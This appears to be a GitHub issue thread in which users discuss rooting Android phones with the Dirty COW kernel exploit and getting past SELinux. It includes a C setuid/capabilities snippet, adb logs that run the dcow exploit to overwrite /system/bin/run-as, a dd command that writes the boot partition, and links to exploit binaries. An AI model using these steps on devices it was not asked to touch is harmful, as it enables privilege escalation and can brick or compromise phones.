How do you spawn a shell after exploit?

[naikel]

I've tried execpl, system, even executing chmod(const char *pathname, mode_t mode) in the code but nothing seems to work.

I do get getuid() == 0, but I can't do anything with that privilege.

EDIT: My device does NOT have /system/bin/run-as with setuid and I have seen NO device that has it set.

[joel0]

The setuid bit was changed in Android 4.3(?) to Linux capabilities. run-as has the Linux capability to set the UID to 0 (root), but in my experimenting, it seems to lack other useful capabilities, such as writing files.

I would start by looking at the AOSP implementation of run-as and finding how it executes the packages and remove some safety checks.

[rhcp011235]

You need to disable SELinux first

[naikel]

10-24 23:40:22.933 10954 10954 W run-as : type=1400 audit(0.0:728): avc: denied { setenforce } for uid=0 scontext=u:r:runas:s0 tcontext=u:object_r:kernel:s0 tclass=security permissive=0

Not that trivial, to me at least.

[rhcp011235]

what do you mean? You didn't spawn a shell did you?

check the binary - -rwxr-xr-x 1 root shell 18K 2009-01-01 03:00 app_process64

[naikel]

I can't spawn a shell from the run-as context.

I have app_process32 (same thing). It has the zygote context. The one I pasted before was using the runas context. From that context I can't disable SELinux either:

10-24 23:44:58.603 11542 11542 W app_process: type=1400 audit(0.0:738): avc: denied { setenforce } for uid=0 scontext=u:r:zygote:s0 tcontext=u:object_r:kernel:s0 tclass=security permissive=0

[lucasa831]

what if we just use the exploit to replace install-recovery.sh with a script that paste su into it's folder then overwrites itself to the original superuser install recovery file then it'll load itself

[naikel]

You can't. Remember the whole /system is reconstructed before boot. If you reboot you'll lose all your changes.

[lucasa831]

what about using it to replace something like the reboot binary (that may be ran as root) with a binary that mount system as rw then paste everything needed by superuser

[naikel]

The problem is the SELinux context. The best choice is replacing app_process32. You can get root, that's no problem. That's easy.

But then you have a root that can't do anything. When you try to write a file it says denied, because you can only write files that the SELinux context allows you to. That is, for example, the dalvik cache. You can create a file there. Let's say you copy the su there. You run it: SAME PROBLEM. Now you have a shell, with the same SELinux context.

What you want is:

• To remount /system as rw
• To write su to /system/xbin/su, that way su will run on the SELinux context "su_exec".

So what else you can do? disable SELinux, so you can do all this. But if you could disable SELinux in a SELinux context, SELinux wouldn't exist in the first place....

I think I lost hope with dirty cow and Android >= 5.

[rhcp011235]

Jcase has rooted the latest HTC 10 running latest android using this. so i assume there is a way :)

[rhcp011235]

You can disable selinux in selinux. The init context can enable (or disable) it.
So wherever init is. Over write it

[Manouchehri]

PS C:\Users\david> adb shell
shell@flo:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:shell:s0
shell@flo:/ $ run-as id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0
shell@flo:/ $ ls -lZ /sbin/
opendir failed, Permission denied
1|shell@flo:/ $ run-as ls -lZ /sbin/
-rwxr-x--- root     root              u:object_r:rootfs:s0 adbd
-rwxr-x--- root     root              u:object_r:rootfs:s0 healthd
lrwxrwxrwx root     root              u:object_r:rootfs:s0 ueventd -> ../init
lrwxrwxrwx root     root              u:object_r:rootfs:s0 watchdogd -> ../init
shell@flo:/ $ cat /init.flo.diag.rc
/system/bin/sh: cat: /init.flo.diag.rc: Permission denied
1|shell@flo:/ $ run-as cat /init.flo.diag.rc
# This file gets copied as /init.flo.diag.rc

on post-fs-data
    rm /dev/diag

[naikel]

The problem is this:

shell@flo:/ $ run-as id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats) context=u:r:runas:s0

That's a useless context. Can you execute something in, say, /data/local/tmp as root using that context?

Or better yet, can you remount /system as rw?

Because I couldn't. I can read files like you, but I can write/execute anything.

Using the app_process32 (zygote) context I can do a little more, but at the end of the day they are still useless things.

EDIT: Show me your selinux_android_setcontext() in your run-as.c ;)

[Manouchehri]

Pick a different target so the context isn't an issue anymore.

The answer is here. https://source.android.com/security/selinux/implement.html

[GeneBlue]

So, how to bypass selinux? Could you give some hint? @Manouchehri

[ghost]

can you post the source code of the run-as you are using to get root access?

[naikel]

In my device these are the only targets I can pick:

shell@victara:/system/bin $ ( ls -lZ 2>/dev/null ) | grep -v system_file
-rwxr-xr-x root     shell             u:object_r:zygote_exec:s0 app_process32
-rwxr-xr-x root     shell             u:object_r:dex2oat_exec:s0 dex2oat
-rwxr-xr-x root     shell             u:object_r:logcat_exec:s0 logcat
-rwxr-xr-x root     shell             u:object_r:motobox_exec:s0 motobox
-rwxr-xr-x root     shell             u:object_r:dex2oat_exec:s0 patchoat
-rwxr-x--- root     shell             u:object_r:runas_exec:s0 run-as
-rwxr-xr-x root     shell             u:object_r:shell_exec:s0 sh
-rwxr-xr-x root     shell             u:object_r:toolbox_exec:s0 toolbox
-rwxr-xr-x root     shell             u:object_r:toolbox_exec:s0 toybox

The best context is zygote_exec, but still not very useful.

[Manouchehri]

You have access to way more files than just /system/bin/.

run-as is just spawning toybox there, still limited by SELinux.

[rhcp011235]

We will need to kill SELinux though to get a real shell

[naikel]

What about rewriting the SELinux files like /file_contexts and somehow running "restorecon"... that would "kill" it.

The zygote process (app_process32) has a lot of privileges. Somebody could get an idea by just reading the zygote.te file (you can Google that if you don't want to download the whole Android source).

Interesting things are:

# Override DAC on files and switch uid/gid.
allow zygote self:capability { dac_override setgid setuid fowner };

# Switch SELinux context to app domains.
allow zygote system:process dyntransition;

allow zygote dalvikcache_data_file:file { create_file_perms x_file_perms };

# Read /seapp_contexts and /data/security/seapp_contexts
security_access_policy(zygote)

And many many other things.

[SquallATF]

can we replace kernel module and find a way to trigger insmod to bypass selinux?
my device have follow kernel module

shell@F8132:/ $ ls /system/lib/modules/
ansi_cprng.ko
backlight.ko
bcmdhd.ko
br_netfilter.ko
core_ctl.ko
ecryptfs.ko
generic_bl.ko
kscl.ko
lcd.ko
mmc_block_test.ko
mmc_test.ko
msm-buspm-dev.ko
rdbg.ko
spidev.ko
test-iosched.ko
texfat.ko
ufs_test.ko
wil6210.ko

only follow module inserted

shell@F8132:/ $ lsmod  
Module                  Size  Used by
texfat                157455  0
wlan                  871035  0
kscl                   15531  0
ecryptfs               84851  0

[alien0x00]

@naikel I have an issue when I try to use app_process32 as target. I'm able to apply the "patch" but then, when I try to execute /system/bin/app_process32 I'm not able to become root:

>>> /system/bin/app_process32
Running as uid 2000
Could not set capabilities: Operation not permitted
setresgid/setresuid failed

This is weird! The zygote.pe file contains:
allow zygote self:capability { dac_override setgid setuid fowner chown };
Could you help me?

[naikel]

Remember to always use logcat | grep audit to know exaclty what is going on.

Same thing happens to me with app_process32, but then I can see in the logs that some other root process executes it... and then the phone GUI dies but the shell through adb shell still works.

But I have other problems since zygote can't execute anything on /system/bin:

10-26 10:58:17.712 30113 30113 W app_process: type=1400 audit(0.0:8400): avc: denied { read } for uid=0 path="/system/bin/sh" dev="mmcblk0p38" ino=371 scontext=u:r:zygote:s0 tcontext=u:object_r:shell_exec:s0 tclass=file permissive=0

[alien0x00]

On the logcat, as soon as I "patch" app_process32, I can actually see several processes crashing (as normal to be)

I suppose we need to use another process as target, but... which one?

[umntkid]

I'm getting permission denied on everything on Nexus 4 Android 5.0

char *envp[] = { NULL };
  char *argvv[] = { "-l", "/data/local/tmp/", NULL };
  execve("/system/bin/ls", argvv, envp);
  printf("Something went wrong! %s\n", strerror(errno));

adb shell /system/bin/run-as
running as uid 2000
uid 0
euid 0
Something went wrong! Permission denied

[naikel]

@umntkid you should read the thread first before posting... We already stated u:r:runas:s0 context has no execute permission. You can't do anything in that context.

[rhcp011235]

Not 100% true.

@naikel @umntkid this works just fine:

#include <unistd.h>
#include <stdio.h>
#include <sys/capability.h>
#include <dirent.h>

int main(int argc, char **argv)
{
DIR *dir;
struct __user_cap_header_struct capheader;
struct __user_cap_data_struct capdata[2];
struct dirent *ent;

printf("running as uid %d\n", getuid());

memset(&capheader, 0, sizeof(capheader));
memset(&capdata, 0, sizeof(capdata));
capheader.version = _LINUX_CAPABILITY_VERSION_3;
capdata[CAP_TO_INDEX(CAP_SETUID)].effective |= CAP_TO_MASK(CAP_SETUID);
capdata[CAP_TO_INDEX(CAP_SETGID)].effective |= CAP_TO_MASK(CAP_SETGID);
capdata[CAP_TO_INDEX(CAP_SETUID)].permitted |= CAP_TO_MASK(CAP_SETUID);
capdata[CAP_TO_INDEX(CAP_SETGID)].permitted |= CAP_TO_MASK(CAP_SETGID);
if (capset(&capheader, &capdata[0]) < 0) {
printf("Could not set capabilities: %s\n", strerror(errno));
}

if(setresgid(0,0,0) || setresuid(0,0,0)) {
printf("setresgid/setresuid failed\n");
}

if ((dir = opendir ("/sbin/")) != NULL) {
while ((ent = readdir (dir)) != NULL) {
printf ("%s\n", ent->d_name);
}
closedir (dir);
}
return 0;
}

[naikel]

Yes, you can read files in the runas context.

[Manouchehri]

You can use u:r:runas:s0 to run dirtycow recursively for fun, so you can modify /init*rc files that way (but of course that isn't persistent, probably not what you want).

[vinecodes]

@eeeeyal What is this tool?

https://cloud.githubusercontent.com/assets/10957376/22936751/1dafbe96-f2df-11e6-8f76-e1b8d2c4c714.png

[TonyStark]

@naikel @joel0
is there any way to get aboot.img from /dev/block??

[droidvoider]

Look at farm-root it is designed to pull / push boot images. (actually in the code it pushes recovery only but you can just edit it to be boot. (use my copy I updated it with newer dirtycow)
https://github.com/droidvoider/N920A-farm-root
change the line in toolbox.c to look like this, guessing on the fly, double check stuff
const char *args[] = {"/system/bin/dd", "if=/cache/recovery/recovery_push.img", "of=/dev/block/bootdevice/by-name/boot", "bs=4096", 0};

I think it is imperative the file sizes are the same. Also there's a file recovery-from-boot.p which I think might need to be taken down also.

[TonyStark]

@droidvoider Thanks but i think its not work, posting in issue on your repo (https://github.com/droidvoider/N920A-farm-root/issues/1)

[me2151]

@TonyStark what device do you have? My v20 root method has access to abbot and boot images on stock device

[TonyStark]

@me2151 i have coolpad arm64-v8a mashmellow, how did you access?
i tried that run-as, dirtycow method but it give me permission denied everywhere.

[me2151]

@TonyStark daisychaining multiple dirtycow files together to get access to the atd file. Then dirtycowed a custom binary to atd that backup the aboot and boot images

[TonyStark]

@me2151 do you have working dirtycow source code? so i can compile and test....

[me2151]

@TonyStark I do not have my source code anymore but I do have the compiled files that are needed to run the exploit. https://www.androidfilehost.com/?fid=457095661767122821 delete any .IMG files in the zip so you don't accidentally install them

[me2151]

@TonyStark if you read the .bat files(right click then edit) you can see exactly which commands to do.

[TonyStark]

@me2151 okay downloading and checking, thanks

[me2151]

@TonyStark when going through everything after you finish everything in step 1 you need to type run-as con in your adb shell and it SHOULD give you a # that's only temporary then you need to chmod 0777 /storage/emulated/0/*
Then run applypatch /system/bin/atd /storage/emulated/0/dirtysanta

This was developed for android 7.0 so it may not work on 6.0. If its a tablet you are using it may not have the atd file. You do not need to run step 2 or 3. The aboot and boot imaged will automatically backup to the /storage/emulated/0 directory.

[me2151]

@TonyStark forgot to mention the apply patch command needs to be run from a terminal emulator on the device itself.

[me2151]

Good luck

[TonyStark]

@me2151 i successfully run step1.sh however applypatch /system/bin/atd /storage/emulated/0/dirtysanta giving error that could not open /system/bin/atd

[me2151]

@TonyStark can you go to the directory can confirm you actually have atd? Its caller I'd if I remember right so tablets may not have it

[me2151]

Also did you run it from the device and not your adb shell?

[TonyStark]

@me2151
Well its not tablet.
there is no atd file in system/bin
here is all the thing inside system/bin (http://pastebin.com/QUdKM2si)
Yes i ran from both, adb and device emulator. but same error.

[me2151]

@TonyStark well that sucks. You will have to go through your selinux contexts to see what has read access to aboot_block_file. Its probably because the device is marshmallow that is doesn't have the atd file.

[TonyStark]

@me2151 hmm. okay
using farm-root cant we pull aboot.img?

[sirmordred]

hello all
i made a simple app "DirtyCow Checker" and published on playstore https://play.google.com/store/apps/details?id=com.oguzhan.mordred.testdirty&hl=EN

You guys can use it to verify dirtycow is usable on device or not with this app

[sirmordred]

Google removed the app from playstore because of violating policy -they said-
For those who want to try app:
here is the thread on xda(you can find apk file on there): https://forum.xda-developers.com/android/software/dirtycow-checkerapp-2-3-t3585546

[walkman4321]

I am trying to root samsung galaxy o7 android version 6.0
follow the steps mention in README.md files
CVE-2016-5195-master$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory /home/rohitnew/CVE-2016-5195-master' [armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow [armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as make[1]: Leaving directory /home/rohitnew/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
dcow /data/local/tmp/run-as /system/bin/run-as
warning: new file size (5544) and destination file size (17916) differ

[] size 17916
[] mmap 0xb6e15000
[] currently 0xb6e15000=464c457f
[] using /proc/self/mem method
[] madvise = 0xb6e15000 17916
[] madvise = 0 16777216
[] /proc/self/mem 1649005660 571497
[] exploited 0 0xb6e15000=464c457f

CVE-2016-5195-master$ adb shell
shell@o7prolte:/ $ run-as id
run-as: Package 'id' is unknown

It gives me this error "Package 'id' is unknown". Please help me if I am doing something wrong

[timwr]

Try make test, perhaps your device isn't vulnerable

[walkman4321]

Thank you for reply me
Yes you are correct
$make test
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23
make[1]: Entering directory /home/rohitnew/xlastfilder/CVE-2016-5195-master' [armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow [armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as make[1]: Leaving directory /home/rohitnew/xlastfilder/CVE-2016-5195-master'
adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow
[100%] /data/local/tmp/dcow
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push test.sh /data/local/tmp/test.sh
[100%] /data/local/tmp/test.sh
adb shell 'chmod 777 /data/local/tmp/dcow'
adb shell 'chmod 777 /data/local/tmp/test.sh'
adb shell '/data/local/tmp/test.sh'
-rw-rw-rw- shell shell 18 2017-06-15 16:17 test
-rwxrwxrwx shell shell 367 2017-02-27 09:59 test.sh
-r--r--r-- shell shell 18 2017-06-15 16:17 test2
adb shell '/data/local/tmp/dcow /data/local/tmp/test /data/local/tmp/test2'
dcow /data/local/tmp/test /data/local/tmp/test2
[] size 18
[] mmap 0xb6e4e000
[] currently 0xb6e4e000=72756f79
[] using /proc/self/mem method
[] madvise = 0xb6e4e000 18
[] madvise = 0 16777216
[] /proc/self/mem 71637732 3979874
[] exploited 0 0xb6e4e000=6e6c7576
adb shell 'cat /data/local/tmp/test2'
yournotvulnerable
adb shell 'cat /data/local/tmp/test2' | xxd
0000000: 796f 7572 6e6f 7476 756c 6e65 7261 626c yournotvulnerabl
0000010: 650d 0a e..
So my device can not be exploit.Is there any other way to exploit this device

[msftsecurityteam]

Hi guys, maybe this was answered above. I am gaining root in my process but SELinux does not allow me to drop to a shell as root. I have complete control over the selinux policy and can make any changes I want. What is/are the rule(s) that I need to add/remove for a Samsung KNOX 2.6 Android 6.0.1 to allow me to get a root shell?

[hemowahib]

@eeeeyal What is this tool?

https://cloud.githubusercontent.com/assets/10957376/22936751/1dafbe96-f2df-11e6-8f76-e1b8d2c4c714.png

i need this tools
give me please